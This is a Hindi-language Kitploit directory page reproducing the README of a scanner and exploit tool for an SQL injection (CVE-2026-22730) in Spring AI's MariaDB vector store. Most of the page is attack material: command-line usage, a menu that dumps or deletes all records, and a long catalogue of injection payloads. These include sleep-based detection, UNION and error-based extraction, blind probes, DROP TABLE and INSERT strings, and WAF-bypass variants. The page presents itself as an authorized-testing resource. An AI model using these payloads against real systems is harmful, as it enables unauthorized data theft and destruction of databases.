Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22730-Scanner — स्कैनर और एक्सप्लॉइट टूल CVE-2026-22730 के लिए, जो Spring AI के MariaDB वेक्टर स्टोर में एक SQL इंजेक्शन है। समय-आधारित पहचान, GET/POST विधियों, और रिपोर्टिंग के साथ एक्सप्लॉइटेशन का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/null200ok/cve-2026-22730-scanner
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubnull200ok/cve-2026-22730-scanner

CVE-2026-22730-Scanner

स्कैनर और एक्सप्लॉइट टूल CVE-2026-22730 के लिए, जो Spring AI के MariaDB वेक्टर स्टोर में एक SQL इंजेक्शन है। समय-आधारित पहचान, GET/POST विधियों, और रिपोर्टिंग के साथ एक्सप्लॉइटेशन का समर्थन करता है।

रिपॉजिटरी देखें
25 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-22730 स्कैनर और एक्सप्लॉइट – Spring AI MariaDB वेक्टर स्टोर SQL इंजेक्शन

Python Version
License
Status

CVE-2026-22730 के लिए एक पेशेवर सुरक्षा मूल्यांकन उपकरण – Spring AI के MariaDB वेक्टर स्टोर में खोजी गई एक गंभीर SQL इंजेक्शन भेद्यता। यह उपकरण अधिकृत पेनिट्रेशन टेस्टर और सुरक्षा शोधकर्ताओं को शैक्षिक या रक्षात्मक उद्देश्यों के लिए भेद्यता का पता लगाने और सुरक्षित रूप से एक्सप्लॉइट करने की अनुमति देता है।

📖 अवलोकन

CVE-2026-22730 Spring AI संस्करण 1.0.x < 1.0.4 और 1.1.x < 1.1.3 को प्रभावित करता है जब MariaDB वेक्टर स्टोर का उपयोग किया जाता है। फ़िल्टर एक्सप्रेशन में स्ट्रिंग मानों के अनुचित एस्केपिंग के कारण, एक हमलावर उपयोगकर्ता-नियंत्रित पैरामीटर (जैसे, मेटाडेटा फ़िल्टर) के माध्यम से मनमाना SQL इंजेक्ट कर सकता है। इससे निम्न हो सकता है:

अनधिकृत डेटा पुनर्प्राप्ति – मेटाडेटा-आधारित एक्सेस नियंत्रण को बायपास करना

पूर्ण डेटाबेस विलोपन – पूरे वेक्टर स्टोर को मिटाना (विनाशकारी)

मौन डेटा रिसाव – RAG पाइपलाइनों में, लीक हुआ डेटा बिना पहचान के LLM प्रतिक्रियाओं में शामिल हो जाता है

यह उपकरण अधिकृत सुरक्षा मूल्यांकन के दौरान भेद्यता की उपस्थिति को सत्यापित करने और इसके प्रभाव को प्रदर्शित करने (स्पष्ट सहमति के साथ) के लिए एक सुरक्षित, कॉन्फ़िगर करने योग्य विधि प्रदान करता है।

🚀 विशेषताएँ

✅ समय-आधारित पहचान – भेद्यता की पुष्टि करने के लिए SLEEP() इंजेक्शन का उपयोग करता है

✅ एकाधिक HTTP विधियाँ – GET (क्वेरी पैरामीटर) और POST (JSON बॉडी) का समर्थन करता है

✅ कस्टम स्लीप अवधि – नेटवर्क विलंबता या गोपनीयता आवश्यकताओं के लिए समायोजित करें

✅ एक्सप्लॉइटेशन विकल्प – सभी दस्तावेज़ पुनर्प्राप्त करें (SELECT) या सभी हटाएँ (DELETE)

✅ व्यापक रिपोर्टिंग – HTML, JSON और सादा-पाठ रिपोर्ट उत्पन्न करता है

✅ उपयोगकर्ता-अनुकूल CLI – इंटरैक्टिव मोड और पूर्ण कमांड-लाइन तर्क

✅ विस्तार योग्य पेलोड प्रणाली – कस्टम इंजेक्शन स्ट्रिंग्स को आसानी से एकीकृत करें

📋 आवश्यकताएँ

Python 3.6 या उच्चतर

requests लाइब्रेरी (pip install requests)

🔧 स्थापना

bash git clone https://github.com/NULL200OK/cve-2026-22730-scanner.git

cd cve-2026-22730-scanner

📖 उपयोग

स्क्रिप्ट को इंटरैक्टिव मोड या कमांड-लाइन तर्कों के साथ चलाया जा सकता है।

मूल सिंटैक्स

bash

python cve-2026-22730_scanner.py [options]

विकल्प

विकल्प विवरण

--url लक्ष्य URL (जैसे, http://localhost:8081/api/docs)

--method HTTP विधि: GET या POST (डिफ़ॉल्ट: GET)

--param GET के लिए क्वेरी पैरामीटर नाम, या POST के लिए संदर्भ नाम (वैकल्पिक)

--json-template PAYLOAD प्लेसहोल्डर के साथ JSON टेम्पलेट (POST के लिए आवश्यक)

--baseline बेसलाइन अनुरोध के लिए हानिरहित मान (डिफ़ॉल्ट: nonexistent)

--sleep समय-आधारित पहचान के लिए स्लीप सेकंड (डिफ़ॉल्ट: 5)

उदाहरण

  1. GET अनुरोध (क्वेरी पैरामीटर)

bash

python cve-2026-22730_scanner.py --url "http://localhost:8081/api/docs" --method GET --param "department"

  1. JSON बॉडी के साथ POST अनुरोध

bash

python cve-2026-22730_scanner.py --url "http://localhost:8081/api/search" --method POST --json-template '{"department": "PAYLOAD"}'

  1. कस्टम स्लीप समय और बेसलाइन

bash

python cve-2026-22730_scanner.py --url "http://example.com/search" --param "filter" --sleep 10 --baseline "HR"

  1. इंटरैक्टिव मोड

bash

python cve-2026-22730_scanner.py

आपको URL, विधि, पैरामीटर/JSON टेम्पलेट, बेसलाइन और स्लीप समय के लिए संकेत दिया जाएगा।

एक्सप्लॉइटेशन वर्कफ़्लो

यदि लक्ष्य भेद्य पाया जाता है, तो स्क्रिप्ट एक मेनू प्रस्तुत करती है:

text

[?] लक्ष्य भेद्य है। एक्सप्लॉइटेशन विकल्प चुनें:

root@kitploit:~
1. सभी दस्तावेज़ पुनर्प्राप्त करें (SELECT इंजेक्शन)

2. सभी दस्तावेज़ हटाएँ (DELETE इंजेक्शन) - विनाशकारी

3. एक्सप्लॉइटेशन छोड़ें

विकल्प 1 सभी पंक्तियों को पुनर्प्राप्त करने के लिए ' OR '1'='1 भेजता है (गैर-विनाशकारी, केवल डेटा पढ़ता है)।

विकल्प 2 DELETE HTTP विधि का उपयोग करके समान पेलोड भेजता है – सभी रिकॉर्ड स्थायी रूप से हटा देता है। स्पष्ट पुष्टि की आवश्यकता होती है।

सभी क्रियाएँ लॉग की जाती हैं और अंतिम रिपोर्ट में शामिल की जाती हैं।

📁 आउटपुट फ़ाइलें

प्रत्येक रन के बाद, वर्तमान निर्देशिका में तीन टाइमस्टैम्प वाली फ़ाइलें बनाई जाती हैं:

cve-2026-22730_YYYYMMDD_HHMMSS.json – सभी विवरणों के साथ मशीन-पठनीय JSON रिपोर्ट।

cve-2026-22730_YYYYMMDD_HHMMSS.txt – सादा-पाठ सारांश, जिसमें कोई भी एक्सप्लॉइटेशन डेटा शामिल है।

cve-2026-22730_YYYYMMDD_HHMMSS.html – स्वरूपित HTML रिपोर्ट, साझा करने या संग्रहीत करने के लिए उपयुक्त।

⚠️ महत्वपूर्ण अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।

उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।

लेखक इस सॉफ़्टवेयर के दुरुपयोग या क्षति के लिए कोई दायित्व नहीं मानता है।

किसी भी लक्ष्य को स्कैन या एक्सप्लॉइट करने से पहले हमेशा लिखित अनुमति प्राप्त करें।

📚 संदर्भ

GitHub सुरक्षा सलाहकार GHSA‑c267‑rfvc‑mvpm

Spring सुरक्षा सलाहकार AV26‑245

SecureLayer7 द्वारा मूल शोध लेख

🤝 योगदान

पुल अनुरोध, बग रिपोर्ट और सुविधा सुझावों का स्वागत है। बड़े बदलावों पर चर्चा करने के लिए कृपया पहले एक मुद्दा खोलें।

📄 लाइसेंस

यह परियोजना MIT लाइसेंस के तहत लाइसेंस प्राप्त है – विवरण के लिए LICENSE फ़ाइल देखें।

Nabeel द्वारा ❤️ के साथ विकसित

PYLOAD के लिए उदाहरण

सुरक्षा समुदाय के लिए

📌 इन पेलोड्स का उपयोग कैसे करें

स्क्रिप्ट में, POST के साथ --json-template का उपयोग करते समय, नीचे दी गई सूची से किसी भी पेलोड के साथ PAYLOAD बदलें।

GET अनुरोधों के लिए, पेलोड को पैरामीटर मान के रूप में पास करें (स्क्रिप्ट URL एन्कोडिंग को स्वचालित रूप से संभालती है)।

🔥 पेलोड श्रेणियाँ

  1. पहचान / समय-आधारित

ये इंजेक्शन सफल होने पर विलंब का कारण बनते हैं। भेद्यता की पुष्टि करने के लिए इनका उपयोग करें।

पेलोड विवरण

' OR SLEEP(5) -- मानक समय-आधारित पेलोड। यदि क्वेरी ~5 सेकंड के लिए रुकती है, तो इंजेक्शन काम करता है।

' OR BENCHMARK(10000000,MD5('a')) -- MySQL/MariaDB के लिए विकल्प (BENCHMARK)।

' OR (SELECT * FROM (SELECT(SLEEP(5)))a) -- कुछ फ़िल्टर को बायपास करने के लिए नेस्टेड स्लीप।

' OR 1=1 AND SLEEP(5) -- हमेशा-सत्य स्थिति को स्लीप के साथ जोड़ता है।

  1. प्रमाणीकरण बायपास / सभी पंक्तियाँ पुनर्प्राप्त करें

ये WHERE क्लॉज़ को हमेशा सत्य बनाते हैं, सभी रिकॉर्ड लौटाते हैं।

पेलोड विवरण

' OR '1'='1 क्लासिक हमेशा-सत्य इंजेक्शन।

' OR 1=1 -- एक और वैरिएंट (-- के बाद स्थान की आवश्यकता होती है)।

' OR ''=' खाली स्ट्रिंग तुलना पर निर्भर करता है।

' OR 1=1# MariaDB टिप्पणी के लिए # का उपयोग करता है (URL-एन्कोडेड %23 के रूप में)।

' OR 1=1 LIMIT 1 -- केवल एक पंक्ति लौटाता है (नियंत्रित आउटपुट के लिए उपयोगी)

  1. यूनियन-आधारित डेटा निष्कर्षण

उपयोगी जब एप्लिकेशन परिणाम प्रदर्शित करता है। आपको कॉलम की संख्या से मेल खाना होगा।

पेलोड विवरण

' UNION SELECT NULL, database(), user(), version() -- डेटाबेस नाम, उपयोगकर्ता, संस्करण पुनर्प्राप्त करें। (कॉलम से मेल खाने के लिए NULL गिनती समायोजित करें।)

' UNION SELECT 1, table_name, 3 FROM information_schema.tables WHERE table_schema=database() -- तालिकाएँ सूचीबद्ध करें।

' UNION SELECT 1, column_name, 3 FROM information_schema.columns WHERE table_name='vector_store' -- कॉलम सूचीबद्ध करें।

' UNION SELECT 1, content, metadata FROM vector_store -- वास्तविक डेटा डंप करें (यदि कॉलम गिनती मेल खाती है)।

  1. त्रुटि-आधारित निष्कर्षण

त्रुटियाँ ट्रिगर करें जो जानकारी लीक करती हैं।

पेलोड विवरण

' AND extractvalue(1, concat(0x7e, database())) -- MariaDB/MySQL त्रुटि-आधारित।

' AND updatexml(1, concat(0x7e, version()), 1) -- एक और त्रुटि विधि।

' OR 1 GROUP BY concat(database(), floor(rand(0)*2)) HAVING min(0) -- डुप्लिकेट कुंजी त्रुटि।

  1. बूलियन-आधारित (ब्लाइंड)

उपयोगी जब कोई आउटपुट या त्रुटियाँ नहीं दिखाई जाती हैं, लेकिन एप्लिकेशन व्यवहार बदलता है।

पेलोड विवरण

' AND (SELECT ascii(substring(database(),1,1))) > 64 -- डेटाबेस नाम के पहले वर्ण की जाँच करता है।

' AND (SELECT COUNT(*) FROM information_schema.tables) > 10 -- तालिकाओं की संख्या जाँचता है।

' OR (SELECT 1 FROM users LIMIT 1) = 1 -- तालिका के अस्तित्व का परीक्षण करता है।

  1. लेखन / विलोपन संचालन

विनाशकारी पेलोड (अत्यधिक सावधानी के साथ उपयोग करें)।

पेलोड विवरण

' OR '1'='1 DELETE के साथ उपयोग करने पर, सभी पंक्तियाँ हटा देता है।

' OR 1=1; DROP TABLE vector_store -- पूरी तालिका को हटाने का प्रयास करता है (स्टैक्ड क्वेरी की आवश्यकता होती है, अक्सर अक्षम)।

' OR 1=1; INSERT INTO vector_store (content) VALUES ('hacked') -- नया डेटा सम्मिलित करने का प्रयास करता है।

  1. फ़िल्टर / WAF बायपास

सरल पैटर्न मिलान से बचने के लिए अस्पष्ट संस्करण।

पेलोड विवरण

%27%20OR%20SLEEP(5)%20-- URL-एन्कोडेड (स्क्रिप्ट इसे स्वचालित रूप से संभालती है)।

' //OR//SLEEP(5)/**/-- कीवर्ड तोड़ने के लिए इनलाइन टिप्पणियाँ।

' OR 0x273d27=0x273d27 -- हेक्स-एन्कोडेड तुलना ('=')।

' OR 1=1 /!50000SLEEP(5)/ -- MySQL संस्करण-विशिष्ट टिप्पणी।

  1. CVE सलाहकार से विशिष्ट पेलोड

पेलोड विवरण

' OR '1'='1 सभी दस्तावेज़ पुनर्प्राप्त करने के लिए उपयोग किया जाता है (प्रमाण की अवधारणा)।

' OR SLEEP(5) -- स्कैनर में उपयोग किया जाने वाला समय-आधारित पहचान पेलोड।

' OR '1'='1 DELETE इंजेक्शन के लिए भी उपयोग किया जाता है।

📝 पेलोड के साथ उदाहरण JSON टेम्पलेट

json

{"department": "' OR SLEEP(5) --"}

{"department": "' OR '1'='1"}

{"department": "' UNION SELECT 1, content, metadata FROM vector_store --"}

स्क्रिप्ट में, आप टेम्पलेट को इस प्रकार पास करेंगे:

bash

--json-template '{"department": "PAYLOAD"}'

स्क्रिप्ट PAYLOAD को वास्तविक पेलोड से बदल देगी।

नोट URL के बारे में

स्क्रिप्ट को उस एंडपॉइंट का पूर्ण URL चाहिए जो भेद्य पैरामीटर स्वीकार करता है। उदाहरण के लिए:

✅ http://example.com/api/docs – यदि एंडपॉइंट /api/docs है

✅ http://example.com/search – यदि एंडपॉइंट /search है

❌ http://example.com – पर्याप्त नहीं, स्क्रिप्ट को सटीक पथ चाहिए

टूल डाउनलोड करें